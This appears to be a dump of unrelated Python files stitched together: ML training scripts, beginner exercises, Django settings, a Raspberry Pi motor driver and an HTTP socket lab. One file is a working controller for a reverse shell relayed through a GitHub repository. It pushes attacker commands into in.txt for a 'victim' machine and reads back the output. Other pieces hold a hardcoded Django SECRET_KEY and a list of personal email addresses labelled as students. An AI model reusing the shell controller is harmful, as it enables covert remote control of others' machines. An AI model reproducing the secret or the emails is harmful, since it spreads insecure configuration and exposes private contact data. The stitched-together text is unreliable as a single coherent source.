# from keras.layers import Conv1D, MaxPooling2D
# from keras.layers import GRU, Bidirectional
# from keras.layers import Dense
# from keras.optimizers import Adam
#
# # Build the model
# # input layers (as placeholder)
# input_layer = Input(shape=(300,26), name='input')
# # convolutional layers
# conv_2d = Conv1D(filters=64, kernel_size=5, strides=5, padding='valid')(input_layer)
# # recurrent_layers
# bi_gru = Bidirectional(GRU(units=64, activation='elu', return_sequences=False))(conv_2d)
# dense_1 = Dense(units=32, activation='elu')(bi_gru)
# dense_2 = Dense(units = 1, activation='sigmoid')(dense_1)
# model = Model(input_layer, dense_2)
# print (model.summary())
#
# import numpy as np
# # for consistency
# np.random.seed(0)
# data = np.random.rand(100, 300, 26)
# label = np.random.randint(0,2,(100,))
#
# from keras.optimizers import Adam
# optimizer = Adam(lr=0.001)
# model.compile(loss = 'binary_crossentropy', optimizer=optimizer)
#
# model.fit(data, label, epochs=10)
# model.save('trained_model.h5')
#
# from keras.models import load_model
# # Pass your .h5 file here
# model = load_model('trained_model.h5')
# test_data = np.random.rand(1,300,26)
# result = model.predict(test_data)
# print (result)
|
import report_transfer
import regional_report_transfer
import firm_report_transfer
import pmu_report_transfer
import bank_report |
#!/usr/bin/python3
try:
import json
import sys
save_to_json_file = __import__('7-save_to_json_file').save_to_json_file
load_from_json_file = __import__(
'8-load_from_json_file').load_from_json_file
except ImportError:
print("Import Error")
"""
script to add arguments to a JSON list
"""
try:
a_list = load_from_json_file('add_item.json')
except FileNotFoundError:
a_list = []
for arg in sys.argv:
if arg == sys.argv[0]:
continue
a_list.append(arg)
save_to_json_file(a_list, 'add_item.json')
|
from .base import *
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
INSTALLED_APPS += (
'django_nose',
)
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7!@uqrj1=0riqnmyl+79jbsu5t$uz7=7rjc1+sx=1(%)o4ox6c'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
try:
from .local import *
except ImportError:
pass
|
import tensorflow as tf
from text_rcnn_model import TRCNNConfig, TextRCNN
import numpy as np
import tensorflow.contrib.keras as kr
import time
from datetime import timedelta
import os
from data_process import Data
def get_time_dif(start_time):
"""获取已使用时间"""
end_time = time.time()
time_dif = end_time - start_time
return timedelta(seconds=int(round(time_dif)))
def batch_iter(x, y, batch_size=128):
"""生成批次数据"""
data_len = len(x)
num_batch = int((data_len - 1) / batch_size) + 1
indices = np.random.permutation(np.arange(data_len))
x_shuffle = x[indices]
y_shuffle = y[indices]
for i in range(num_batch):
start_id = i * batch_size
end_id = min((i + 1) * batch_size, data_len)
max_len = config.seq_length
# padding="post", truncating="post"的目的是当sequence length大于max_len时,将大于max_len的部分抛弃
# 当sequence length小于max_len时,从末尾开始padding
# 如果max_len=None,则pad_sequences会默认按照最长序列的长度padding和truncating
x_shuffle_padded = kr.preprocessing.sequence.pad_sequences(x_shuffle[start_id:end_id], maxlen=max_len,
padding="post", truncating="post")
yield x_shuffle_padded, y_shuffle[start_id:end_id]
def feed_data(x_batch, y_batch, keep_prob):
sequence_lengths = data.get_sequence_length(x_batch)
feed_dict = {
model.input_x: x_batch,
model.input_y: y_batch,
model.sequence_lengths: sequence_lengths,
model.keep_prob: keep_prob,
}
return feed_dict
def evaluate(sess, x_, y_):
# 评估在某一数据上的准确率和损失
data_len = len(x_)
batch_eval = batch_iter(x_, y_)
total_loss = 0.0
total_acc = 0.0
for x_batch, y_batch in batch_eval:
batch_len = len(x_batch)
feed_dict = feed_data(x_batch, y_batch, 1.0)
loss, acc = sess.run([model.loss, model.acc], feed_dict=feed_dict)
total_loss += loss * batch_len
total_acc += acc * batch_len
return total_loss / data_len, total_acc / data_len
def train(x_train_src, y_train_src, x_valid_src, y_valid_src, model_src):
if not os.path.exists(model_src):
os.mkdir(model_src)
tensorboard_dir = 'tensorboard'
if not os.path.exists(os.path.join(model_src, tensorboard_dir)):
os.mkdir(os.path.join(model_src, tensorboard_dir))
tf.summary.scalar("loss", model.loss)
tf.summary.scalar("accuracy", model.acc)
merged_summary = tf.summary.merge_all()
writer = tf.summary.FileWriter(os.path.join(model_src, tensorboard_dir))
# 配置 Saver
saver = tf.train.Saver()
print("Loading training and validation data...")
# 载入训练集与验证集
start_time = time.time()
x_train = np.load(x_train_src, allow_pickle=True)
y_train = np.load(y_train_src)
x_valid = np.load(x_valid_src, allow_pickle=True)
y_valid = np.load(y_valid_src)
time_dif = get_time_dif(start_time)
print("Time usage:", time_dif)
# 创建session
session = tf.Session()
session.run(tf.global_variables_initializer())
writer.add_graph(session.graph)
print('Training and evaluating...')
start_time = time.time()
total_batch = 0 # 总批次
best_acc_val = 0.0 # 最佳验证集准确率
last_improved = 0 # 记录上一次提升批次
require_improvement = 1000 # 如果超过n个iter未提升,提前结束训练
flag = False
for epoch in range(100):
print("Epoch: {}".format(epoch))
batch_train = batch_iter(x_train, y_train)
for x_batch, y_batch in batch_train:
feed_dict = feed_data(x_batch, y_batch, 0.5)
if total_batch % config.save_per_batch == 0:
# 每多少轮次将训练结果写入tensorboard scalar
s = session.run(merged_summary, feed_dict=feed_dict)
writer.add_summary(s, total_batch)
if total_batch % config.print_per_batch == 0:
# 每多少轮次输出在训练集和验证集上的性能
# feed_dict = feed_data(x_valid, x_valid, len_valid, 1.0)
loss_train, acc_train = session.run([model.loss, model.acc], feed_dict=feed_dict)
loss_valid, acc_valid = evaluate(session, x_valid, y_valid)
if acc_valid > best_acc_val:
# 保存最好结果
best_acc_val = acc_valid
last_improved = total_batch
saver.save(sess=session, save_path=os.path.join(model_src, "best_validation"))
time_dif = get_time_dif(start_time)
improved_str = '*'
else:
improved_str = ''
msg = 'Iter: {}, Train Loss: {}, Train Acc: {},' \
+ ' Val Loss: {}, Val Acc: {}, Time: {} {}'
print(msg.format(total_batch, loss_train, acc_train, loss_valid, acc_valid, time_dif, improved_str))
session.run(model.opt, feed_dict=feed_dict) # 运行优化
total_batch += 1
if total_batch - last_improved > require_improvement:
# 验证集正确率长期不提升,提前结束训练
print("No optimization for a long time, auto-stopping...")
flag = True
break # 跳出循环
if flag:
break
print("the best acc on validation is {}".format(best_acc_val))
if __name__ == "__main__":
data = Data()
vocab_src = "data/middle_result/vocab.npy"
vocab, _ = data.load_vocab(vocab_src)
config = TRCNNConfig()
config.vocab_size = len(vocab)
model_src = "data/model/rcnn"
train_src = "data/vectorized_data/train"
validation_src = "data/vectorized_data/validation"
x_train_src = os.path.join(train_src, "x.npy")
y_train_src = os.path.join(train_src, "y.npy")
x_valid_src = os.path.join(validation_src, "x.npy")
y_valid_src = os.path.join(validation_src, "y.npy")
model = TextRCNN(config)
train(x_train_src, y_train_src, x_valid_src, y_valid_src, model_src)
|
# Assignment 2.2
# 2.2 Write a program that uses input to prompt a user for their name and then welcomes them. Note that input will pop
# up a dialog box.
name = input("Enter your name ")
print("Hello " + name)
# Assignment 2.3
# 2.3 Write a program to prompt the user for hours and rate per hour using input to compute gross pay. Use 35 hours
# and a rate of 2.75 per hour to test the program (the pay should be 96.25). You should use input to read a string
# and float() to convert the string to a number. Do not worry about error checking or bad user data.
hrs = input("Enter Hours: ")
rate = input("Enter Rate: ")
print("Pay:", float(hrs)*float(rate))
|
from test_support import *
def test_exception():
t = rf.FpException("test")
assert t.what().startswith("test")
|
'''
random number generator
'''
import os
import binascii
import argparse
parser = argparse.ArgumentParser(description='generate random string')
parser.add_argument('size', metavar='size', type=int, help='length of the random string')
args = parser.parse_args()
string = binascii.b2a_base64(os.urandom(args.size))
string = string[:args.size]
string = str(string, encoding='utf-8')
print(string)
|
def Col(i):
if i%2:
return i*3+1
return i//2
i=int(input())
print(i,end=" ")
while(i:=Col(i)):
print(i,end=" ")
if i==1:
break
|
students_email = [
'nenavathpraveen10@gmail.com',
'sapna98saini@gmail.com',
'90.preeti@gmail.com',
'aryali012@gmail.com',
'venkateshmamidala39@gmail.com',
'somasekhardesigns@gmail.com',
'zeddkhan101@gmail.com',
'kumarkartavay@gmail.com',
'biswajit27m@gmail.com',
'sp4185202@gmail.com',
'neerajpal8548@gmail.com',
'sbankar217@gmail.com',
'cp150496@gmail.com',
'santprakash28877@gmail.com',
'vgowdavenu112@gmail.com',
'scorpioveer@gmail.com',
'veershinde195@gmail.com',
'safikulsk732@gmail.com',
'90.preeti@gmail.com',
'sapna98saini@gmail.com',
'bhavanreddy326@gmail.com',
'khanabdulgani_87@yahoo.com',
'kumarkartavay@gmail.com',
'bariavs41@gmail.com',
'somasekhardesigns@gmail.com',
'saurabhdongre16@gmail.com',
'saurabhdongre16@gmail.com',
'zeddkhan101@gmail.com',
'zeddkhan101@gmail.com',
'kumarkartavay@gmail.com',
'kumarkartavay@gmail.com',
'parthivbhatti007@gmail.com',
'bhattiujjval007@gmail.com',
'kumarkartavay@gmail.com',
'kumarkartavay@gmail.com',
'santprakash28877@gmail.com',
'rajnishkumar8595@gmail.com',
's.kumar.s8101997@gmail.com ',
'kanhu.kcn@gmail.com',
'zeddkhan101@gmail.com',
'govindsarraf4109@gmail.com',
'himanshugoyal785@gmail.com',
'bhattiujjval007@gmail.com',
'shailendermy.10@gmail.com' ,
'saurabhdongre16@gmail.com',
'nitypatel6@gmail.com',
'subirsgghosh@gmail.com',
'jk426704@gmail.com',
'gokulharsha06@gmail.com',
'parthivbhatti007@gmail.com',
'nm.mahesh66@gmail.com',
'bariavs41@gmail.com',
'amarsharma00786@gmail.com',
'sharmadheeraj849@gmail.com ',
'santprakash28877@gmail.com',
'ruthvikchintam@gmail.com',
'bhavanreddy326@gmail.com',
'bariavs41@gmail.com',
'sirlakhwinder@gmail.com'
]
temp = [
]
no_of_students = len(students_email)
# print(no_of_students)
# remove duplicate
students_email =list(set(students_email))
# sorted list
students_email.sort()
# print(len(students_email))
# print students mail serially
for student in range(len(students_email)):
print(str((student+1)).rjust(2,' '), students_email[student])
# print(students_email[student],',')
# temp2 = []
# for i in temp:
# if i not in students_email:
# temp2.append(i)
# for i in temp2:
# print(i,',') |
# [DOCS]
# https://docs.python.jp/3/library/codecs.html
# rot暗号を解くためのスクリプト
import codecs
import sys
argv = sys.argv
if (len(argv) != 3):
print('Argument is less. Please add char and rot num.')
exit()
enc = argv[1]
rot_num = argv[2]
answer = ''
for letter in enc:
answer += chr(ord('A') + (ord(letter)-ord('A')+int(rot_num)) % 26)
print(answer)
|
#!/usr/bin/env python3
from collections import Counter
import sys
def parse_line(l):
[ins, out] = l.split(" => ")
ins = ins.split(", ")
ins = [component.split(" ") for component in ins]
ins = {chemical: int(qty)
for [qty, chemical] in ins}
out = out.strip().split(" ")
return (out, ins)
with open(sys.argv[1]) as f:
chemicals = {out[1]: { "in": ins, "out": int(out[0]) }
for out, ins in [parse_line(l) for l in f.readlines()]}
def required_ore(fuel_qty):
spare = Counter()
required = Counter()
required["FUEL"] = fuel_qty
while True:
#print("Requirements {}".format(dict(required)))
if len(required) == 1 and "ORE" in required:
break
next_required = Counter()
for component, qty in required.items():
#print("Need {} x {}".format(component, qty))
if component == "ORE":
next_required["ORE"] += qty
continue
# First check if we can use some spare chemicals
if spare[component] > 0:
use_spare = min(spare[component], qty)
qty -= use_spare
spare[component] -= use_spare
#print("Took {} from storage".format(use_spare))
assert qty >= 0
if qty == 0:
continue
# Find the reaction that generates component,
# add add necessary reagents to requirements
gen_qty = chemicals[component]["out"]
gen_requirements = chemicals[component]["in"]
reaction_count = ((qty - 1) // gen_qty) + 1
#print("Gen {} from {} x {}".format(reaction_count * gen_qty, reaction_count, chemicals[component]))
spare_qty = (reaction_count * gen_qty) - qty
if spare_qty:
#print("Add {} x {} to storage".format(component, spare_qty))
spare[component] += spare_qty
for reagent, reagent_qty in gen_requirements.items():
next_required[reagent] += reaction_count * reagent_qty
#print(reagent, next_required[reagent])
required = next_required
return required["ORE"]
TARGET = 1000000000000
baseline = required_ore(1)
print("1 FUEL <= {} ORE".format(baseline))
estimate_fuel = TARGET // baseline
actual_ore = required_ore(estimate_fuel)
if actual_ore > TARGET:
fuel_range = [0, estimate_fuel]
else:
fuel_range = [estimate_fuel, estimate_fuel * 2]
while True:
if fuel_range[1] - fuel_range[0] <= 1:
break
try_fuel = (fuel_range[0] + fuel_range[1]) // 2
actual_ore = required_ore(try_fuel)
if actual_ore > TARGET:
fuel_range = [fuel_range[0], try_fuel]
else:
fuel_range = [try_fuel, fuel_range[1]]
print("{} FUEL <= {} ORE".format(fuel_range[0], required_ore(fuel_range[0])))
|
# @desc: script that formats json array data to elastic bulk data
# @author: mladen milosevic
# @date: 25.02.2020.
import json
import time
inputFile = 'ebooks.json'
outputFile = 'ebooks-bulk.json'
start = time.process_time()
with open(inputFile, 'r', encoding = "utf8") as moviesFile:
movies = json.load(moviesFile)
with open(outputFile, 'w+') as bulkFile:
for i in range(len(movies)):
index = f'{{"index": {{ "_id":"{i+1}" }} }}\n'
bulkFile.write(index)
bulkFile.write(f'{json.dumps(movies[i])}\n')
print(time.process_time() - start) |
from django.urls import path
from . import views
urlpatterns = [
path('',views.home),
path('views/',views.index),
path('map/',views.coordinates),
path('add/', views.add_squirrel),
path('views/<str:Unique_Squirrel_ID>/edit/',views.edit_squirrel),
path('stats/',views.stats),
]
|
# Developed since: Feb 2010
import upy.core
import numpy
# Reference:
# Siegfried Gottwald, Herbert K"astner, Helmut Rudolph (Hg.):
# Meyers kleine Enzyklop"adie Mathematik
# 14., neu bearbeitete und erweiterte Aufl. -
# Mannheim, Leipzig, Wien, Z"urich: Meyers Lexikonverlag, 1995
# Abschn. 28.2. Ausgleichsrechnung, S. 659 ff.
# - Lineare Regression S. 667
__all__ = ['linear_regression']
def linear_regression(x, y, weights = None, dtype = None):
"""Calculates the linear regression of values Y at positions X. X is
assumed to be an iterable of arrays of an numeric type, and will be
converted into an array of type DTYPE. Y can be either an iterable of
undarrays, or also an iterable of ordinary arrays. Y will be converted
into a sequence of upy.undarrays first. When WEIGHTS is not given, the
weights will be derived from the variances of the Y. If the variance
of an Y element is zero, the weight will be set to unity. WEIGHTS, if
given, override the weights derived from variances. The weights are
calculated from variances by 1.0 / ua.variance(). Also, DTYPE can be
given, specifying the dtype of X and Y after conversion."""
# Convert x's elements to a single numpy.ndarrays, if necessary ...
sequence_x = numpy.asarray(x, dtype = dtype)
# Convert y's elements to upy.undarrays, if necessary ...
sequence_y = map(
lambda element: upy.core.undarray(element, dtype = dtype), y)
# Extract the number of elements ...
N = len(sequence_y)
# Do a simple-minded check. If the shape of the sub-arrays doesn't match,
# some future call will probably fail to execute.
assert(len(sequence_x) == len(sequence_y))
# Extract the nominal values ...
x_s = sequence_x # Already ready to be used.
a_s = numpy.asarray([element.value for element in sequence_y])
# Extract the weights ...
if weights is None:
# Derive the weights from sequence_ua.
p_s = [ua.weight() for ua in sequence_y]
else:
# Use the given weigths.
p_s = weights
# Convert p_s into a numpy.ndarray for speed ...
p_s = numpy.asarray(p_s)
# Perform calculation ...
pa = (p_s * a_s).sum(axis = 0)
px2 = (p_s * x_s ** 2).sum(axis = 0)
pax = (p_s * a_s * x_s).sum(axis = 0)
px = (p_s * x_s).sum(axis = 0)
p = p_s.sum(axis = 0)
alpha = (pa * px2 - pax * px) / (p * px2 - px ** 2)
beta = (pax * p - pa * px) / (p * px2 - px ** 2)
peps2 = (p_s * (a_s - alpha - beta * x_s) ** 2).sum(axis = 0)
m = numpy.sqrt(peps2 / float(N - 2))
m_alpha = m * numpy.sqrt(px2 / (p * px2 - px ** 2))
m_beta = m * numpy.sqrt(p / (p * px2 - px ** 2))
return (upy.undarray(alpha, m_alpha, sigmas = 1),
upy.undarray(beta, m_beta, sigmas = 1))
|
#Libraries
import RPi.GPIO as GPIO
import time
#GPIO Mode
GPIO.setmode(GPIO.BOARD)
#set GPIO Pins
Bin1 = 11
Bin2 = 13
Bpwm = 15
slow = 20
med = 50
fast = 100
GPIO.setup(Bin1,GPIO.OUT)
GPIO.setup(Bin2,GPIO.OUT)
GPIO.setup(Bpwm,GPIO.OUT)
rightTopPWM = GPIO.PWM(Bin1,slow)
rightTopPWM.ChangeFrequency(100)
rightTopPWM.start(0)
rightBottomPWM = GPIO.PWM(Bin2,slow)
rightBottomPWM.ChangeFrequency(100)
rightBottomPWM.start(0)
#PWM Parameters
def forward(speed=med):
rightTopPWM.ChangeDutyCycle(speed)
rightBottomPWM.ChangeDutyCycle(0)
def reverse(speed=med):
rightTopPWM.ChangeDutyCycle(0)
rightBottomPWM.ChangeDutyCycle(speed)
def stop():
rightTopPWM.ChangeDutyCycle(0)
rightBottomPWM.ChangeDutyCycle(0)
if __name__ == '__main__':
try:
while True:
forward(slow)
time.sleep(2)
reverse(med)
time.sleep(2)
forward(fast)
time.sleep(2)
stop()
time.sleep(2)
except KeyboardInterrupt:
stop()
print("program stopped")
GPIO.cleanup()
|
#!/usr/bin/python
import git # Interacting with git
from git import Repo # Interacting with git Repositories
import shutil # for conveniently deleting local folder
import hashlib # for getting hash of file
import pexpect # for interacting with shell
from subprocess import Popen, PIPE, STDOUT
import commands
import argparse
import sys
import os
import time
def main():
if(os.path.exists(args.path)):
answer = raw_input("path already exists Should I delete that folder and all its contents? [y/n]? ")
if(answer == "y"):
shutil.rmtree(args.path, ignore_errors=True) # rm -r <path>
# Git Clone - copy down the target repo
print "Cloning " + args.url + " down to " + args.path
Repo.clone_from(args.url, args.path)
localrepo = git.Repo(args.path) # object ref to local path
infile = os.path.join(args.path, 'in.txt') # full path to in.txt
outfile = os.path.join(args.path, 'out.txt') # full path to out.txt
print "infile: " + infile
print "outfile: " + outfile
# Being in the git folder is pretty useful throughout.
os.chdir(args.path)
# calculate the checksum of the outfile currently
outhash = hashlib.md5(open(outfile, 'rb').read()).hexdigest()
print "outhash: " + outhash
try:
setupAuthentication()
print "Have set your GitHub authentication token for you!"
except:
print "User was already authenticated to GitHub"
while True:
# git pull - check for changes
#print "git pull - synching remote to local"
#localrepo.remotes.origin.pull()
gitPull(localrepo)
# check if outfile has changed
#if(outhash != hashlib.md5(open(outfile, 'rb').read()).hexdigest()):
# display updated output and update outhash
displayOutput(outfile)
outhash = hashlib.md5(open(outfile, 'rb').read()).hexdigest()
# prompt user for input, this blocks the loop on this side until attacker issues command
cmd = raw_input("# ")
if(cmd != ''):
# save cmd into "in.txt"
setIn(infile, cmd)
# git commit - commit changs to "in.txt" in local repo
gitCommit(localrepo, infile)
# git push - push to remote
gitPush(localrepo)
time.sleep(5)
# wait for victim to commit response.
getResponse()
else:
# delay for 2 seconds
print "Waiting 5 seconds"
time.sleep(5)
def getResponse():
#print "== getResponse "
count = 0
while True:
count = count+1
print "checking remote repo for updates loop #" + str(count)
status, output = commands.getstatusoutput("git fetch")
#print output
if(len(output) != 0):
print "Victim updated repo!"
return # exit getResponse
# This executes a "push" request to trigger a github authentication prompt.
# It then enters the credentials for you.
# Token authentcation works with the token as the username and a blank password.
def setupAuthentication():
# We need to setup authentication for github.
# This one tells git to save credentials
os.system("git config credential.helper store")
print "credential.helper store executed"
child = pexpect.spawn('git push origin master')
child.expect("Username*", timeout=2)
child.sendline(args.token)
child.expect("Password*", timeout=2)
child.sendline("")
child.expect(pexpect.EOF)
# git push - pushes local changes up to remote
def gitPush(localrepo):
#print "== gitPush"
#localrepo.remotes.origin.push()
#os.system("git push origin master")
proc = Popen(['git', 'push', 'origin','master'], stdout=PIPE, stderr=STDOUT)
status, output = commands.getstatusoutput("git push origin master")
# git commit - commits the latest "in.txt" locally
def gitCommit(localrepo, infile):
#print "== gitCommit"
#os.system("git add in.txt")
status, output = commands.getstatusoutput("git add in.txt")
#print output
status, output = commands.getstatusoutput("git commit -m 'attacker'")
#print output
#proc = Popen('cd ' + args.path + '/ && git add in.txt', stdout=PIPE, stderr=STDOUT)
#proc = Popen('cd ' + args.path + '/ && git commit -m \'attacker\'', stdout=PIPE, stderr=STDOUT)
#os.system("git commit -m 'attacker'")
def gitPull(localrepo):
#proc = Popen(['git', 'pull'], stdout=PIPE, stderr=STDOUT)
# print "== gitPull"
status, output = commands.getstatusoutput("git pull")
# print output
# display the contents of "out.txt"
# this may have crypto to deal with soon.
def displayOutput(outfile):
#print "== displayOutput"
with open(outfile) as f:
print f.read()
# save the attacker's command into "in.txt"
# this may have crypto to deal with soon.
def setIn(infile, cmd):
f = open(infile,'w')
f.write(cmd)
f.close()
################################################################################
################################################################################
def usage():
return "== Example Usage ==\n\n" + sys.argv[0] + " -u https://github.com/username/repo -p /tmp/gitshell -t 11111111111111111111111111"
# Defining the arguments and parsing the args.
parser = argparse.ArgumentParser(
description='Using a GitHub repository to deliver a reverse shell',
epilog=usage(),
formatter_class=argparse.RawDescriptionHelpFormatter)
parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
required.add_argument("-u", "--url", type=str, help="URL to github repo you will communicate through", required=True)
required.add_argument("-p", "--path",type=str, help="Local path to clone repo to", required=True)
required.add_argument("-t", "--token",type=str, help="GitHub authentication token", required=True)
try:
args = parser.parse_args()
except:
#print sys.exc_info()
#parser.print_help()
sys.exit(0)
main()
|
import os
#os.rename("a.txt", "b.txt")
#os.remove("b.txt")
res = os.listdir("./anli")
print(res)
print(os.path.isdir("./anli/game"))
#os.mkdir("./anli/dirtest")
#os.rmdir("./anli/dirtest")
print(os.getcwd())
|
from distutils.core import setup
setup(
name='plugwise',
packages=['plugwise'],
version='0.2',
license='MIT',
description='A library for communicating with Plugwise smartplugs',
author='Sven Petai',
author_email='hadara@bsd.ee',
url='https://bitbucket.org/hadara/python-plugwise/wiki/Home',
download_url='https://github.com/cyberjunky/plugwise/archive/0.2.tar.gz',
install_requires=[
'crcmod',
'pyserial',
],
scripts=['plugwise_util'],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
],
)
|
#!/usr/bin/env python3
"""
Author: Francis C. Dailig
Project Name: Project 1
Description: Code for Project 1. Three test cases: 1 - Small HTTP object; 2 - Large HTTP object; 3 - Simple HTTP Server
"""
import argparse
import socket
def testCase1():
"""
This function will run the first test case for project 1
It will request a small http object from gaia.cs.umass.edu
Source used: https://stackoverflow.com/questions/49848375/how-to-use-python-socket-to-get-a-html-page
"""
#Create socket and connect to webserver
host = "gaia.cs.umass.edu" #human readable address of the webserver
port = 80 #port of the webserver
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Create TCP Socket
s.connect((host,port)) #connect to the Webserver
#Send Request for http object
request = "GET /wireshark-labs/INTRO-wireshark-file1.html HTTP/1.1\r\nHost:gaia.cs.umass.edu\r\n\r\n"
s.send(request.encode())
#Get Response
response = s.recv(1024)
http_response = repr(response)
#close socket
s.close()
#Print Response
print('Request: {}'.format(request))
print('[RECV] - {}\n'.format(len(response)))
print(response.decode())
def testCase2():
"""
This function will run test case 2 of project 1
This will request a large html object
Source use: https://steelkiwi.com/blog/working-tcp-sockets/
"""
#Create socket and connect to webserver
host = "gaia.cs.umass.edu" #human readable address of the webserver
port = 80 #port of the webserver
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Create TCP Socket
s.connect((host,port)) #connect to the Webserver
#Send Request to web server
request = "GET /wireshark-labs/HTTP-wireshark-file3.html HTTP/1.1\r\nHost:gaia.cs.umass.edu\r\n\r\n"
s.send(request.encode())
chunk = s.recv(1024)
response = chunk
while True:
chunk = s.recv(1024)
response += chunk
if not chunk:
break
print('Request: {}'.format(request))
print('[RECV] - {}'.format(len(response)))
print(response.decode())
s.close()
def testCase3():
"""
This function will run test case 3 of project 1
This will create simple http server on port 31337
Source used: https://stackoverflow.com/questions/39535855/send-receive-data-over-a-socket-python3
"""
server_addr = ('0.0.0.0',31337) #server will listen on port 31337
data = "HTTP/1.1 200 OK\r\n"\
"Content-Type: text/html; charset=UTF-8\r\n\r\n"\
"<html>Congratulations! You've downloaded the first Wireshark lab file!</html>\r\n"
#Create a socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Bind address
sock.bind(server_addr)
#Listen for incomming connection
sock.listen(5)
print("Webserver is listening. Browse to: http://127.0.0.1:31337")
while True:
c, addr = sock.accept()
received = c.recv(1024)
print("Received: {}".format(received))
print("sending >>>>>>>>>>>>>>>>>>>>")
print(data)
print("<<<<<<<<<<<<<<<<<<<<")
c.send(bytes(data, 'utf8'))
c.close()
break
def main():
parser = argparse.ArgumentParser(usage='python3 http.py -case {1, 2, 3}', formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-case', required=True, choices=range(1,4), type=int,
help="test case number:\n1 - small http file\n2 - large http file\n3 - http server\n")
args = parser.parse_args()
if args.case == 1:
print("Running test Case 1 - Small HTTP Request")
testCase1()
elif args.case == 2:
print("Running test case 2 - Large HTTP Request.")
testCase2()
else:
print("Runnning test case 3 - Simple HTTP Server.")
testCase3()
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
"""
Created on Thu May 10 23:37:09 2018
@author: zeeshan haider
"""
from IPython import get_ipython
get_ipython().magic('reset -sf')
import pyaudio
import wave
import os
import librosa
import numpy as np
import cPickle
path="E:\\All Data\\study\\MS\\2\\machine learning\\Project\\background_dataset"
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 22050
RECORD_SECONDS =1
load_training = open("E:\\All Data\study\\MS\\2\\machine learning\\Project\\save_training_1.pickle",'rb')
clf = cPickle.load(load_training) # LOAD TRAINED CLASSIFIER
load_training.close()
for i in range(8000):
WAVE_OUTPUT_FILENAME = "background"+".wav"
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
frames = []
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
wf = wave.open(path+"\\"+WAVE_OUTPUT_FILENAME, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
y, sr = librosa.load(path+"\\"+WAVE_OUTPUT_FILENAME,duration=1)
S = librosa.feature.mfcc(y=y, sr=sr, hop_length=512, n_mfcc=20)
S=np.reshape(S,np.product(S.shape))
S=np.concatenate((S,S[840:860]))
print clf.predict([S]) |
"""
Python code snippets vol 38:
188-Calculate percentage
stevepython.wordpress.com
requirements: None
source:
https://docs.python.org/3/library/string.html#module-string
"""
points = 10
total = 300
print('Percentage of points from total is: {:.2%}'.format(points/total))
#Output:
#>>>Percentage of points from total is: 3.33%
|
#!/usr/bin/python
import pandas as pd
from ete2 import Tree
import numpy as np
def Make_VJ_Matrix():
#format for calling location matrix_name['J_name'].loc['V_name']
V_names = ['IGHV1-12', 'IGHV4-4', 'IGHV1-17', 'IGHV1-14', 'IGHV3-15', 'IGHV1-18', 'IGHV3-11', 'IGHV3-13', 'IGHV(III)-16-1', \
'IGHV3-33-2', 'IGHV4-30-4%31', 'IGHV3-19', 'IGHV(II)-33-1', 'IGHV3-7', 'IGHV3-6', 'IGHV3-30-2', 'IGHV(III)-5-2', \
'IGHV(II)-30-1', 'IGHV4-59%61', 'IGHV(III)-25-1', 'IGHV(IV)-44-1', 'IGHV(II)-65-1', 'IGHV1-24', 'IGHV3-16', 'IGHV(III)-2-1', \
'IGHV1-NL1', 'IGHV2-70', 'IGHV4-30-2', 'IGHV3-63', 'IGHV3-64', 'IGHV3-65', 'IGHV4-80', 'IGHV7-4-1', 'IGHV(III)-47-1', \
'IGHV5-78', 'IGHV3-d', 'IGHV(II)-74-1', 'IGHV3-h', 'IGHV(III)-11-1', 'IGHV3-79', 'IGHV3-73', 'IGHV3-72', 'IGHV3-71', \
'IGHV3-76', 'IGHV3-75', 'IGHV3-74', 'IGHV(III)-82', 'IGHV1-8', 'IGHV7-34-1%40%NL1.rn', 'IGHV1-3', 'IGHV1-2', 'IGHV4-39', \
'IGHV4-34', 'IGHV7-81', 'IGHV(II)-62-1', 'IGHV(II)-51-2', 'IGHV3-48', 'IGHV3-49', 'IGHV3-47', 'IGHV3-42', 'IGHV(II)-22-1', \
'IGHV3-41', 'IGHV3-60%62', 'IGHV7-27', 'IGHV3-9', 'IGHV(II)-44-2', 'IGHV1-f', 'IGHV(III)-38-1', 'IGHV1-c', 'IGHV6-1', \
'IGHV3-52', 'IGHV3-54', 'IGHV3-57', 'IGHV(III)-67-4', 'IGHV(III)-67-3', 'IGHV(II)-31-1', 'IGHV2-5', 'IGHV4-55', 'IGHV3-43', \
'IGHV(II)-53-1', 'IGHV1-45', 'IGHV1-46', 'IGHV3-25', 'IGHV3-20', 'IGHV3-21', 'IGHV3-22', 'IGHV3-23', 'IGHV3-29', 'IGHV(III)-51-1', \
'IGHV(II)-78-1', 'IGHV1-58', 'IGHV5-a', 'IGHV5-51', 'IGHV(II)-15-1', 'IGHV3-37', 'IGHV3-36', 'IGHV3-35', 'IGHV3-32', 'IGHV2-26', \
'IGHV3-38', 'IGHV(III)-13-1', 'IGHV1-67', 'IGHV(III)-44', 'IGHV1-68', 'IGHV1-69', 'IGHV(II)-28-1', 'IGHV(II)-60-1', 'IGHV(II)-49-1', \
'IGHV(III)-26-1', 'IGHV7-56', 'IGHV4-28', 'IGHV3-53%66', 'IGHV(II)-20-1', 'IGHV2-10', 'IGHV3-30%33rn', 'IGHV4-b', 'IGHV(III)-76-1', \
'mIGHV6-3%6', 'IGHV3-NL1', 'mIGHV7-3']
J_names = ['TRAJ57', 'TRBJ2-4', 'TRBJ2-5', 'TRBJ2-6', 'TRBJ2-7', 'TRBJ2-1', 'TRBJ2-2', 'IGHJ1P', 'TRAJ30', 'TRAJ31', 'TRAJ32', 'TRAJ33', \
